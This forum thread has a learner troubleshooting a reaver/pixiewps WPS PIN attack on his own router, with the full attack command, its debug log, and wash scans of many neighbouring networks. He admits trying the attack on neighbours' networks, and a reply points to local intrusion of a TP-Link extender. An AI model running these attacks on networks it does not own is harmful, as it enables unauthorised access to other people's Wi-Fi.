Wifi-libre.com: Free thought for a free internet

#1 09-04-2019 14:20:58

uko
User

Registered: 09-04-2019
Posts: 2

Trying to crack my WPS

Hi, first of all let me introduce myself: I'm a full-stack web developer and I've been tinkering with cybersecurity and ethical hacking for a while, since that is what has always really appealed to me in the tech sector.
The thing is, I'm following an Ethical Hacking course and I've reached the section on wireless vulnerabilities. I tried a dictionary brute-force attack (I changed the password to the typical 'password') and it worked without problems, but when I try to get the WPS PIN of my Wi-Fi, I can't do it (I have to say I have also been guilty of trying with neighbors' networks in case mine was the one failing), but all the others give me errors 02, 03 or 04.
Another question I want to ask: how can I see my WPS PIN so I can test directly with the -p option? I connected to the router at 192.168.1.1 but I can't find anything about the PIN; it only gives me the option to enable or disable WPS.
I use Kali live USB with persistence, and the network adapter is a WN722N.
Here is a paste of the terminal:

[email protected]:~# reaver -i wlan0mon -b MI_MAC_ADDRESS -vvv -K -d 15 -w -N -f

Reaver v1.6.5-git-19-gfeb454c WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[?] Restore previous session for MI_MAC_ADDRESS? [n/Y] n
[+] Waiting for beacon from MI_MAC_ADDRESS
[+] Received beacon from MI_MAC_ADDRESS
[+] Vendor: AtherosC
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:337
send_packet called from authenticate() 80211.c:368
[+] Sending authentication request
send_packet called from associate() 80211.c:421
[+] Sending association request
[+] Associated with MI_MAC_ADDRESS (ESSID: vodafoneXXXX)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=378 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 6d be 2d 6f 68 d0 58 2b b8 0c 63 dc 40 48 e6 05
WPS: Enrollee MAC Address MI_MAC_ADDRESS
WPS: Enrollee Nonce - hexdump(len=16): 1b 04 cf b8 ad aa 08 de b9 97 a5 fe b7 8f d3 b1
WPS: Enrollee Authentication Type flags 0x3f
WPS: No match in supported authentication types (own 0x0 Enrollee 0x3f)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0xf
WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x8 [Display]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=7):
     54 50 2d 4c 49 4e 4b                              TP-LINK         
WPS: Model Name - hexdump_ascii(len=10):
     54 4c 2d 57 41 38 35 34 52 45                     TL-WA854RE      
WPS: Model Number - hexdump_ascii(len=4):
     32 2e 30 0d                                       2.0_            
WPS: Serial Number - hexdump_ascii(len=0):
WPS: Primary Device Type: 0-00000000-0
WPS: Device Name - hexdump_ascii(len=10):
     54 4c 2d 57 41 38 35 34 52 45                     TL-WA854RE      
WPS: Enrollee RF Bands 0x3
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): b2 6d 5a c6 5e be a0 18 39 69 9e ae 71 8a 8a f0
WPS: UUID-R - hexdump(len=16): 6f e3 d6 68 21 8e 7f 13 8e 8b 09 e4 29 11 bc 35
WPS: Building Message M2
WPS:  * Version
WPS:  * Message Type (5)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * UUID-R
WPS:  * Public Key
WPS: Generate new DH keys
WPS: DHKey - hexdump(len=32): 85 8d 4b 30 d4 5f 18 e9 08 05 2b 7a 87 01 43 2a fc a9 66 2d c4 99 55 13 88 58 dd f0 52 6b 8e 25
WPS: KDK - hexdump(len=32): 7b ef 13 17 5f d9 ea 8f f2 0d 29 75 bd 90 82 ef 37 bb f2 e4 54 14 f3 d3 ff 06 5d 5e ce 2a a7 d7
WPS: AuthKey - hexdump(len=32): ff f5 0a ac 36 d4 33 60 1f 77 35 e0 72 0f b2 36 22 93 00 63 5d 1d d3 7f f7 b9 b5 72 db 6f 85 71
WPS: KeyWrapKey - hexdump(len=16): de 72 97 65 59 d8 dc 88 78 54 d3 07 8f b0 14 e3
WPS: EMSK - hexdump(len=32): f1 6e 69 2a 05 44 18 a2 b0 5b ba ef 04 ff be bb 92 dd 92 9a f4 2d f6 be b9 bc 4d dd c4 57 98 4e
WPS:  * Authentication Type Flags
WPS:  * Encryption Type Flags
WPS:  * Connection Type Flags
WPS:  * Config Methods (8c)
WPS:  * Manufacturer
WPS:  * Model Name
WPS:  * Model Number
WPS:  * Serial Number
WPS:  * Primary Device Type
WPS:  * Device Name
WPS:  * RF Bands (1)
WPS:  * Association State
WPS:  * Configuration Error (0)
WPS:  * Device Password ID (0)
WPS:  * OS Version
WPS:  * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=378 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: Unexpected state (15) for receiving M1
WPS: returning
[+] Received M1 message
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=114 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 55 d1 77 4e ca 09 e2 7e 0f 29 75 ca 7b 13 a6 6d b3 5b f7 ff 78 e6 cb 8e 33 65 1d 53 08 46 b4 dc
WPS: E-Hash2 - hexdump(len=32): f2 8e a3 29 31 cf 3f f3 a9 cb ac 36 5a 81 80 ae 29 31 e8 5f 27 38 1a f7 cd 55 dc 7b 9b b0 b4 a5
executing pixiewps -e 0788e46c4d83ad817fa504d17c8a9a685d4ac8b59a930b592255032b3a1220b190248036fb649dbb363d4399a6e4409b98b2f2a35cda48a2ec94075e400508fc111979e835fc91e33d52d0a1f5e305ec30abee2463f44f66d20e760a5d46267feb8851536f4f85a75bafa429edd5a09dda7955a0efcece4211f164f9b6a1f5a77ea22152b0d5c41ce77d970d432666f72e15d29149a12507d6c0cb8139a96fb63910c46b150b366a6deee2d77c64f1c5b50773f7d169ed6846940d994b284a19 -s 55d1774eca09e27e0f2975ca7b13a66db35bf7ff78e6cb8e33651d530846b4dc -z f28ea32931cf3ff3a9cbac365a8180ae2931e85f27381af7cd55dc7b9bb0b4a5 -a fff50aac36d433601f7735e0720fb236229300635d1dd37ff7b9b572db6f8571 -n 1b04cfb8adaa08deb997a5feb78fd3b1 -r beb8f3865bc224cfc04595e79b2c057b57658afd536c87cb9f7b36ce3a70991ef077ff1bcc1dd4c95cdd282a09a6d36d62e20fb983de37710d8eb445f620c4d4e9cd0902dfac913bc40082455930892693c3f00d5e8522e764ca3e203a209ef072af0b6f96bc8e7801ef4d3ae5586a4dedebdde03c6ac08acb7a5967180e27da23ac36ed69a3ff532cb52d91c91198d83e1b6a0e41030cf970d6f73b30f7706748559dcc45cc07956858acfa83c8b81a749dd660a72f2af40b00f5f9338ffd03

 Pixiewps 1.4

 [-] WPS pin not found!

 [] Time taken: 0 s 89 ms

Offline

#2 09-04-2019 18:41:23

kcdtv
Administrator

Registered: 14-11-2014
Posts: 4,811

Re: Trying to crack my WPS

Welcome to the forum, uko [beer]

"(I have to say I have also been guilty of trying with neighbors' networks in case mine was the one failing)"

Better to keep this kind of comment to yourself... Besides, they add no useful information. [tongue]

"I connected to the router at 192.168.1.1 but I can't find anything about the PIN; it only gives me the option to enable or disable WPS."

That's the current policy: Vodafone, Orange, Telefonica... The ISPs disable PIN mode and lock down the interfaces to prevent its use.
It can only be used in PBC mode.
We have observed with wiire (and more people [big smile]) that some routers in PBC mode sometimes emit an M3, and a pixie dust attack gets run.
But the data is garbage and no PIN is found because... there is no PIN configured.
It certainly looks like that is what is happening to you.
What is your router model? That would be the first thing to say so we can advise you (and if you showed us a probe with wash's -j option, even better [wink])

Offline

#3 10-04-2019 16:29:43

uko
User

Registered: 09-04-2019
Posts: 2

Re: Trying to crack my WPS

Thanks kcdtv!

I'll keep it in mind [roll eyes]

I imagined something like that, since everything documented dated from around 2015, and in 4 years they have had time to try to fix it, although seeing the latest commits of reaver-t6x there was still hope of managing it. But after several days in which I haven't stopped reading forums, as far as Google has let me get, the hopes of achieving it with this vulnerability are fading, since I have tried everything I have come across (except wiire, I haven't found that) and haven't had much luck.

The Pixie Dust thread you linked me I already read yesterday, and I more or less understood how the system works.

JSON of the router:

{"bssid" : "xx:xx:xx:xx:xx", "essid" : "vodafone9EB4", "channel" : 11, "rssi" : -80, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Broadcom", "wps_model_name" : "Broadcom", "wps_model_number" : "123456", "wps_device_name" : "TechnicolorAP", "wps_serial" : "0000001", "wps_uuid" : "b186d5fb84139ca4c855a0c2b8425e50", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}

Full JSON from wash, in case it provides interesting information that could help me learn about some specific vulnerability.

{"bssid" : "xx:xx:xx:xx:xx", "essid" : "MOVISTAR_2A5E", "channel" : 1, "rssi" : -72, "vendor_oui" : "001018", "wps_version" : 16, "wps_state" : 2, "wps_locked" : 1, "wps_manufacturer" : "Broadcom", "wps_model_name" : "Broadcom", "wps_model_number" : "123456", "wps_device_name" : "BroadcomAP", "wps_serial" : "1234", "wps_uuid" : "5f5e58a0dbb18fde9a7e17ba39bfb32a", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0084", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "MiFibra-4ED7", "channel" : 1, "rssi" : -78, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Arcadyan", "wps_model_name" : "Arcadyan", "wps_model_number" : "123456", "wps_device_name" : "PRV3399B_B_LT", "wps_serial" : "1234", "wps_uuid" : "6972de2cb41cbe2d59740c6db1437a67", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "200c", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "JAZZTEL_nqHt", "channel" : 6, "rssi" : -88, "vendor_oui" : "00037F", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "ZTE", "wps_model_name" : "ZXHN F680", "wps_model_number" : "F680 V2.0", "wps_device_name" : "ZXHN F680 V2.0", "wps_serial" : "12345678", "wps_uuid" : "2aa18325308e5bba9f318d4c3789b140", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0480", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "Orange-AF6E", "channel" : 6, "rssi" : -64, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Livebox Corporation", "wps_model_name" : "VRV9510KWAC23", "wps_model_number" : "00.96.613S", "wps_device_name" : "Livebox Wireless Router(WFA)", "wps_serial" : "J615139529", "wps_uuid" : "00000000000000010003d463fea6af6f", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "268c", "wps_rf_bands" : "03", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "MOVISTAR_BCFB", "channel" : 6, "rssi" : -67, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "MitraStar", "wps_model_name" : "GPT-2541GNAC", "wps_model_number" : "123456", "wps_device_name" : "GPT-2541GNAC", "wps_serial" : "1234", "wps_uuid" : "446454a46d8e666146c6442f698dab5d", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "200c", "wps_rf_bands" : "03", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "MIWIFI_2G_Nuny", "channel" : 10, "rssi" : -85, "vendor_oui" : "001018", "wps_version" : 16, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "ZTE", "wps_model_name" : "ZXHN F680", "wps_model_number" : "F680 V4.0", "wps_device_name" : "ZXHN F680 V4.0", "wps_serial" : "12345678", "wps_uuid" : "00000000000000000000000000000000", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0080", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "vodafoneDC70", "channel" : 11, "rssi" : -86, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Sagemcom", "wps_model_name" : "Sagemcom", "wps_model_number" : "123456", "wps_device_name" : "SagemcomAP", "wps_serial" : "0000001", "wps_uuid" : "4dfab2252dc6a6df6eac633b9eb9cfdb", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "MOVISTAR_332B", "channel" : 11, "rssi" : -80, "vendor_oui" : "001018", "wps_version" : 16, "wps_state" : 2, "wps_locked" : 1, "wps_manufacturer" : "Broadcom", "wps_model_name" : "Broadcom", "wps_model_number" : "123456", "wps_device_name" : "BroadcomAP", "wps_serial" : "1234", "wps_uuid" : "0da1dd3f9f58d61ea7251c2916fc87df", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0084", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "vodafoneBC50", "channel" : 6, "rssi" : -88, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Broadcom", "wps_model_name" : "Broadcom", "wps_model_number" : "123456", "wps_device_name" : "TechnicolorAP", "wps_serial" : "0000001", "wps_uuid" : "28fa9469df2fbcf1a46ce82398b34804", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "JAZZTEL_brtm", "channel" : 7, "rssi" : -84, "vendor_oui" : "00037F", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "ZTE", "wps_model_name" : "ZXHN F680", "wps_model_number" : "F680 V2.0", "wps_device_name" : "ZXHN F680 V2.0", "wps_serial" : "12345678", "wps_uuid" : "25104987ef105267956306c65cc42d34", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0480", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "vodafone23BF", "channel" : 8, "rssi" : -80, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Broadcom", "wps_model_name" : "Broadcom", "wps_model_number" : "123456", "wps_device_name" : "BroadcomAP", "wps_serial" : "1234", "wps_uuid" : "e9f6d8578cafd59ab88cca546b540bb3", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0000", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "asus", "channel" : 9, "rssi" : -86, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 1, "wps_manufacturer" : "ASUSTeK Computer Inc.", "wps_model_name" : "Wi-Fi Protected Setup Router", "wps_model_number" : "RT-AC68U", "wps_device_name" : "RT-AC68U", "wps_serial" : "b0:6e:bf:3e:6f:28", "wps_uuid" : "ea2b643829ff5832dc32ef21cc4d1d96", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "MIWIFI_2G_3WHs", "channel" : 9, "rssi" : -87, "vendor_oui" : "001018", "wps_version" : 16, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "ZTE", "wps_model_name" : "ZXHN F680", "wps_model_number" : "F680 V4.0", "wps_device_name" : "ZXHN F680 V4.0", "wps_serial" : "12345678", "wps_uuid" : "00000000000000000000000000000000", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0080", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "MOVISTAR_580F", "channel" : 6, "rssi" : -86, "vendor_oui" : "00E04C", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "MistraStar Corp.", "wps_model_name" : "RTL8xxx", "wps_model_number" : "EV-2010-09-20", "wps_device_name" : "HGW-500BNA-QCv2", "wps_serial" : "123456789012347", "wps_uuid" : "6304125310192006122884aa9ce75811", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0000", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "vodafone1490", "channel" : 1, "rssi" : -73, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Sagemcom", "wps_model_name" : "Sagemcom", "wps_model_number" : "123456", "wps_device_name" : "SagemcomAP", "wps_serial" : "0000001", "wps_uuid" : "154ff8e5114d10a60cc0d4d24bdb2e2d", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}

EDIT: Pardon my ignorance, I just saw that Wiire is a person, the creator of pixie I imagine.

EDIT2: When I launch reaver directly at the router it kicks me out. But the range extender is the one that returns the response from my first post.

{"bssid" : "xx:xx:xx:xx:xx", "essid" : "vodafone9EB4", "channel" : 11, "rssi" : -75, "vendor_oui" : "00037F", "wps_version" : 16, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "TP-LINK", "wps_model_name" : "TL-WA854RE", "wps_model_number" : "2.0\\x0d", "wps_device_name" : "TL-WA854RE", "wps_uuid" : "6dbe2d6f68d0582bb80c63dc4048e605", "wps_response_type" : "03", "wps_primary_device_type" : "0000000000000000", "wps_config_methods" : "0008", "wps_rf_bands" : "03", "dummy": 0}

Last edited by uko (10-04-2019 16:54:59)

Offline

#4 11-04-2019 16:06:56

kcdtv
Administrator

Registered: 14-11-2014
Posts: 4,811

Re: Trying to crack my WPS

"EDIT2: When I launch reaver directly at the router it kicks me out. But the range extender is the one that returns the response from my first post"

So we're talking about a TP-Link TL-WA854RE.
I haven't tested it, but reading the manual it seems to me that the WPS is for client (Enrollee) mode. That is, for connecting the repeater to the source router.
Maybe I'm wrong. In any case, if it is possible to use it in registrar mode and you can't configure a PIN, there's no way to use it for your Wi-Fi tests.
If you want to hack it via local intrusion, you've picked a perfect model to learn on [big smile] The (in)security of the TP-Link Technologies TL-WA850RE Wi-Fi Range Extender

Offline
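
The wash -j records posted in this thread can be read field by field. The following is an added example (not part of any post, and not code from reaver or wash) that decodes `wps_config_methods` with the WSC Config Methods bit values and reports whether an access point advertises a PIN-based method, push button only, or nothing, which is what an owner checks when confirming that PIN mode is off on their own equipment. The function names are hypothetical, and the lock-state mapping (1 = locked, 2 = not locked) is an assumption about wash's output.

```python
import json

# WSC "Config Methods" bits. 0x0200/0x0400 qualify PushButton and
# 0x2000/0x4000 qualify Display as virtual or physical (WSC 2.0).
METHOD_BITS = [
    (0x0001, "USBA"), (0x0002, "Ethernet"), (0x0004, "Label"),
    (0x0008, "Display"), (0x0010, "External NFC Token"),
    (0x0020, "Integrated NFC Token"), (0x0040, "NFC Interface"),
    (0x0080, "PushButton"), (0x0100, "Keypad"),
    (0x0200, "Virtual PushButton"), (0x0400, "Physical PushButton"),
    (0x2000, "Virtual Display"), (0x4000, "Physical Display"),
]
PIN_MASK = 0x0004 | 0x0008 | 0x0100  # Label, Display and Keypad imply a PIN
PBC_MASK = 0x0080

# Assumption: wash prints 1 for "AP setup locked" and 2 for "not locked".
LOCK_STATES = {1: True, 2: False}

# Trimmed copies of the poster's own router and extender records, plus one
# constructed push-button-only record for contrast.
SAMPLE_LINES = [
    '{"essid": "vodafone9EB4", "wps_version": 32, "wps_locked": 2, '
    '"wps_device_name": "TechnicolorAP", "wps_config_methods": "2008"}',
    '{"essid": "vodafone9EB4", "wps_version": 16, "wps_locked": 2, '
    '"wps_device_name": "TL-WA854RE", "wps_config_methods": "0008"}',
    '{"essid": "constructed-ap", "wps_version": 32, "wps_locked": 2, '
    '"wps_device_name": "ConstructedAP", "wps_config_methods": "0480"}',
]


def decode_methods(hex_value):
    """Return the method names set in a hex config-methods string."""
    value = int(hex_value, 16)
    return [name for bit, name in METHOD_BITS if value & bit]


def audit_line(line):
    """Summarise one wash -j record; return None for lines that do not parse."""
    try:
        rec = json.loads(line)
        raw = rec.get("wps_config_methods", "0000")
        value = int(raw, 16)
        version = int(rec.get("wps_version", 0))
    except (ValueError, TypeError, AttributeError):
        return None
    if value & PIN_MASK:
        verdict = "PIN method advertised"
    elif value & PBC_MASK:
        verdict = "PBC only"
    else:
        verdict = "no method advertised"
    return {
        "essid": rec.get("essid"),
        "device": rec.get("wps_device_name"),
        "version": f"{version >> 4}.{version & 0x0F}",  # 0x20 -> 2.0
        "locked": LOCK_STATES.get(rec.get("wps_locked")),
        "methods": decode_methods(raw),
        "verdict": verdict,
    }


def audit_lines(lines):
    """Audit every parsable record and skip the rest."""
    return [r for r in (audit_line(l) for l in lines) if r is not None]


if __name__ == "__main__":
    for result in audit_lines(SAMPLE_LINES):
        print(result)
```

Both of the poster's devices advertise Display, yet the reply in post #2 explains that no PIN may be configured behind it: the advertised bits are only what the access point claims.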
